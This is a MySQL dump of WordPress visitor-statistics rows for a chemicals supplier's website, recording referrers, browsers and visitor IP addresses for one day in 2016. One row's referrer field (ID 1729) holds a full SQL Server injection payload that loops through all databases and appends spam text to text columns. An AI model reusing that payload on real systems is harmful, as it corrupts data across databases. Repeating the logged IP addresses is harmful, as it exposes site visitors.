INSERT INTO `wp_statistics_visitor` VALUES (1726, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1727, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1728, '2016-10-08', 'https://www.google.com.tr/', 'Chrome', 'Windows', '49.0.2623.112', '', '176.232.171.199', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1729, '2016-10-08', 'https://google.com\\\\\\\';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in (\\\\\\\'master\\\\\\\',\\\\\\\'tempdb\\\\\\\',\\\\\\\'model\\\\\\\',\\\\\\\'msdb\\\\\\\',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s=\\\\\\\'begin try use [\\\\\\\'+@w+\\\\\\\'];declare @c cursor;declare @d varchar(4000);set @c=cursor for select \\\\\\\'\\\\\\\'update [\\\\\\\'\\\\\\\'+TABLE_NAME+\\\\\\\'\\\\\\\'] set [\\\\\\\'\\\\\\\'+COLUMN_NAME+\\\\\\\'\\\\\\\']=[\\\\\\\'\\\\\\\'+COLUMN_NAME+\\\\\\\'\\\\\\\']+case ABS(CHECKSUM(NewId()))%9 when 0 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'motilium plm \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'+case ABS(CHECKSUM(NewId()))%3 when 0 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'link\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' when 1 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'open\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' else \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'click\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' end +\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' motilium posologia\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' else \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' end\\\\\\\'\\\\\\\' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like \\\\\\\'\\\\\\\'%varchar\\\\\\\'\\\\\\\' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch\\\\\\\';exec (@s);fetch next from @b into @w;end;close @b--', 'Firefox', 'Windows', '24.0', '', '67.228.38.74', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1730, '2016-10-08', 'https://www.miller-stephenson.com/krytox/', 'MSIE', 'Windows', '9.0', '', '204.79.180.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1731, '2016-10-08', 'https://forums.iboats.com/forum/engine-repair-and-maintenance/mercruiser-i-o-inboard-engines-outdrives/398994-limits-of-jb-weld-block-repairs', 'Chrome', 'Windows', '53.0.2785.143', '', '100.10.37.63', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1732, '2016-10-08', 'https://www.miller-stephenson.com/product/epon-815c/', 'Safari', 'iPhone', '7.0', '', '65.55.210.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1733, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/pfpe-oils-greases/', 'Safari', 'iPhone', '7.0', '', '131.253.25.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1734, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1735, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/epon-epoxy/epon-epoxy-novolac-resins/', 'MSIE', 'Windows', '9.0', '', '204.79.180.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1736, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.51.208.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1737, '2016-10-08', 'https://www.miller-stephenson.com/product/ms-153bn/', 'MSIE', 'Windows', '9.0', '', '204.79.180.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1738, '2016-10-08', 'https://www.miller-stephenson.com/product/krytox-ts4-thread-sealant/', 'Chrome', 'Windows', '48.0.2564.109', '', '199.168.97.28', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1739, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '8.0', '', '52.71.155.178', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1740, '2016-10-08', 'https://www.c-english.ru/', 'MSIE', 'Windows', '6.0', '', '37.115.187.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1741, '2016-10-08', 'https://www.google.com.co/', 'Chrome', 'Windows', '53.0.2785.143', '', '190.131.193.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1742, '2016-10-08', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '38.133.86.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1743, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1744, '2016-10-08', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.238', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1745, '2016-10-08', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Safari', 'iPhone', '7.0', '', '65.55.210.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1746, '2016-10-08', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '68.99.244.34', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1747, '2016-10-08', 'https://www.miller-stephenson.com/wishlist/', 'Safari', 'iPhone', '7.0', '', '199.30.25.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1748, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1749, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1750, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '72.228.30.12', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1751, '2016-10-08', 'https://www.miller-stephenson.com/krytox-faq/', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1752, '2016-10-08', 'https://www.google.com', 'Firefox', 'Windows', '29.0', '', '54.186.188.69', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1753, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1754, '2016-10-08', 'https://www.google.com/', 'Chrome', 'iPad', '53.0.2785.109', '', '108.250.177.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1755, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '4.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1756, '2016-10-08', 'https://www.miller-stephenson.com/product/vazo-88/', 'MSIE', 'Windows', '11.0', '', '206.167.137.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1757, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '113.108.192.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1758, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '211.170.68.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1759, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '180.166.244.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1760, '2016-10-08', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiTsLitw8vPAhWBXD4KHYtDCUAQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '137.100.97.30', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1761, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '174.56.125.178', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1762, '2016-10-08', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '107.77.64.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1763, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '123.126.68.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1764, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '169.53.6.107', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1765, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '184.173.144.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1766, '2016-10-08', 'https://www.miller-stephenson.com/category/opteon-articles/', 'MSIE', 'Windows', '9.0', '', '182.118.20.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1767, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '59.60.112.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1768, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1769, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '49.0.2623.112', '', '207.91.154.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1770, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '65.55.213.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1771, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1772, '2016-10-08', 'https://www.google.co.uk/', 'Chrome', 'Windows', '54.0.2840.50', '', '92.25.73.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1773, '2016-10-08', 'https://www.google.com', 'Firefox', 'Macintosh', '47.0', '', '100.15.184.176', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1774, '2016-10-08', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '72.34.114.2', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1775, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '70.209.143.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1776, '2016-10-08', 'https://www.miller-stephenson.com/product/ms-143xd/', 'Chrome', 'Windows', '47.0.2526.111', '', '199.168.97.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1777, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.171.7.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1778, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1779, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1780, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1781, '2016-10-08', 'https://www.practicalmachinist.com/vb/general/need-advice-removing-epoxy-brass-173352/', 'Chrome', 'Macintosh', '53.0.2785.116', '', '151.42.52.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1782, '2016-10-08', 'https://www.google.com/afs/ads?q=utility%20chemicals%20bearing%20assembly%20lubricant%201%20quart%2035-1040&lo=true&adpage=1&adrep=3&r=m&fexp=21404&client=yahoo-us-qs&channel=pc-lteight%2Bpc-pla%2Bst_145623%2Bsyc_100117%2Bsyc_100065&hl=en&adsafe=medium&type=0&oe=UTF-8&ie=UTF-8&format=p4%7Cn3%7Cn3&ad=n6p4&nocache=5071475945344779&num=0&output=uds_ads_only&v=3&adlh=on&adext=as1%2Cl1%2Csr1&bsl=10&u_his=5&u_tz=-240&dt=1475945344780&u_w=1280&u_h=1024&biw=-1&bih=-1&psw=-1&psh=-1&frm=0&uio=uv3cs1va1lo1da1sl1sr1lHsc13sn13-wi567st17sd13sv15sa13lt17ld18lv22-wi567st17sd13sv15sa13lt17ld18lv22-st17sd13sv15sa13lt17ld16lv22&jsv=91621&rurl=httpss%3A%2F%2Fsearch.yahoo.com%2Fsearch%3B_ylt%3DAwrCxh8xIflXlhkA.rNXNyoA%3B_ylc%3DX1MDMjc2NjY3OQRfcgMyBGZyA3lmcC10BGdwcmlkA1FISzZfRHhQVGhDc2pxaWpIVWRFc0EEbl9yc2x0AzAEbl9zdWdnAzAEb3JpZ2luA3NlYXJjaC55YWhvby5jb20EcG9zAzAEcHFzdHIDBHBxc3RybAMwBHFzdHJsAzc0BHF1ZXJ5A3V0aWxpdHklMjBjaGVtaWNhbHMlMjBiZWFyaW5nJTIwYXNzZW1ibHklMjBsdWJyaWNhbnQlMjAxJTIwcXVhcnQlMjAzNS0xMDQwBHRfc3RtcAMxNDc1OTQ1MzQ0%3Fp%3Dutility%2Bchemicals%2Bbearing%2Bassembly%2Blubricant%2B1%2Bquart%2B35-1040%26fr2%3Dsb-top%26fr%3Dyfp-t%26fp%3D1&referer=httpss%3A%2F%2Fsearch.yahoo.com%2Fsearch%3B_ylt%3DA0LEVz8BIflXt.QAmO1XNyoA%3B_ylc%3DX1MDMjc2NjY3OQRfcgMyBGZyA3lmcC10BGdwcmlkAzBWNGJCbm9CUXNDTUhCbzBPbFpZOEEEbl9yc2x0AzAEbl9zdWdnAzAEb3JpZ2luA3NlYXJjaC55YWhvby5jb20EcG9zAzAEcHFzdHIDBHBxc3RybAMwBHFzdHJsAzUyBHF1ZXJ5A3V0aWxpdHklMjBjaGVtaWNhbHMlMjBiZWFyaW5nJTIwYXNzZW1ibHklMjBsdWJyaWNhbnQEdF9zdG1wAzE0NzU5NDUwNjU-%3Fp%3Dutility%2Bchemicals%2Bbearing%2Bassembly%2Blubricant%26fr2%3Dsb-top%26fr%3Dyfp-t%26fp%3D1', 'Edge', 'Windows', '14.14393', '', '24.55.131.228', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1783, '2016-10-08', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjXqfPH1cvPAhVSbX4KHb1fDRQYABAA&sig=AOD64_0XORYgQHvU_TjQCuW3fd-uADH7RQ&rct=j&q=&ved=0ahUKEwiZh-7H1cvPAhVP4WMKHd3KBCgQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '67.61.139.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1784, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '98.10.21.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1785, '2016-10-08', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=68', 'MSIE', 'Windows', '9.0', '', '182.118.25.223', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1786, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '144.76.106.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1787, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '144.76.106.214', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1788, '2016-10-08', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.16', '', '119.128.173.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1789, '2016-10-08', 'https://r.search.yahoo.com/_ylt=A0LEVi8MJvlXUEIACjEPxQt.;_ylu=X3oDMTByNXM5bzY5BGNvbG8DYmYxBHBvcwMzBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1475974796/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fvazo-52%2f/RK=0/RS=tjaWhHSoxcZl0fiun0vTsw3LRe4-', 'Firefox', 'Macintosh', '49.0', '', '74.129.131.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1790, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '45.22.78.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1791, '2016-10-08', 'https://www.miller-stephenson.com/[site_url]/terms-conditions', 'MSIE', 'Windows', '9.0', '', '182.118.21.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1792, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '48.0', '', '73.90.208.174', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1793, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '176.31.39.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1794, '2016-10-08', 'https://www.miller-stephenson.com/product/milglide-compounding-additives/', 'Safari', 'iPhone', '7.0', '', '157.55.2.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1795, '2016-10-08', 'https://www.miller-stephenson.com/product/krytox-gpl-205/', 'Safari', 'iPhone', '7.0', '', '199.30.16.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1796, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '39.0', '', '23.19.101.212', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1797, '2016-10-08', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '138.201.59.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1798, '2016-10-08', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '65.55.210.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1799, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '84.212.217.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1800, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.193.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1801, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '42.96.186.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1802, '2016-10-08', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '49.0', '', '5.236.82.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1803, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '139.196.5.236', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1804, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '62.173.147.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1805, '2016-10-08', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '50.113.52.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1806, '2016-10-08', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1807, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '2.94.65.248', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1808, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.172.136.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1809, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.60.247.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1810, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '173.76.232.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1811, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1812, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '24.0.1309.0', '', '83.166.240.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1813, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.63.197.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1814, '2016-10-08', 'https://australia-opening-times.com/', 'MSIE', 'Windows', '6.0', '', '178.137.176.238', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1815, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.193.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1816, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.41.60.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1817, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.40.253.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1818, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.41.60.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1819, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '69.145.134.14', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1820, '2016-10-08', 'https://www.miller-stephenson.com/vazo-free-radical-initiator/', 'Safari', 'iPhone', '7.0', '', '157.55.12.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1821, '2016-10-08', 'https://www.google.co.uk/', 'Safari', 'iPad', '10.0', '', '82.41.100.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1822, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '193.111.136.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1823, '2016-10-08', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '162.245.211.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1824, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '68.112.128.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1825, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1826, '2016-10-08', 'https://l.facebook.com/lsr.php?u=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&ext=1475955519&hash=AcmdSliCeCZfxLokvCC9evh0JzcwusSHVUJ_-XCBWiqXSw', 'Chrome', 'Windows', '41.0.2228.0', '', '66.220.145.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1827, '2016-10-08', 'https://www.google.com', 'Firefox', 'Windows', '33.0', '', '52.90.94.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1828, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1829, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.253.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1830, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '70.80.42.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1831, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '70.80.42.33', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1832, '2016-10-08', 'https://www.miller-stephenson.com/tag/grease/', 'Safari', 'iPhone', '7.0', '', '65.55.210.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1833, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '22.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1834, '2016-10-08', 'https://www.google.com/', 'Firefox', 'Linux', '49.0', '', '67.247.16.176', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1835, '2016-10-08', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '38.133.89.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1836, '2016-10-08', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '38.133.87.241', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1837, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.56.16.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1838, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1839, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1840, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '67.166.69.248', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1841, '2016-10-08', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '42.236.10.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1842, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '9.0', '', '180.153.185.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1843, '2016-10-08', 'https://www.bing.com/search?q=+Miller+Stephenson+MS+122AV+release+coating%3A&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1844, '2016-10-08', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/', 'MSIE', 'Windows', '9.0', '', '180.153.187.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1845, '2016-10-08', 'https://www.miller-stephenson.com/product/ms-122av/', 'MSIE', 'Windows', '9.0', '', '204.79.180.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1846, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '68.4.92.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1847, '2016-10-08', 'https://www.miller-stephenson.com/tag/tm7/', 'Safari', 'iPhone', '7.0', '', '199.30.24.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1848, '2016-10-08', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '158.106.67.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1849, '2016-10-08', 'https://www.bing.com/search?q=epon+830&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.44', '000', 1, 0); 
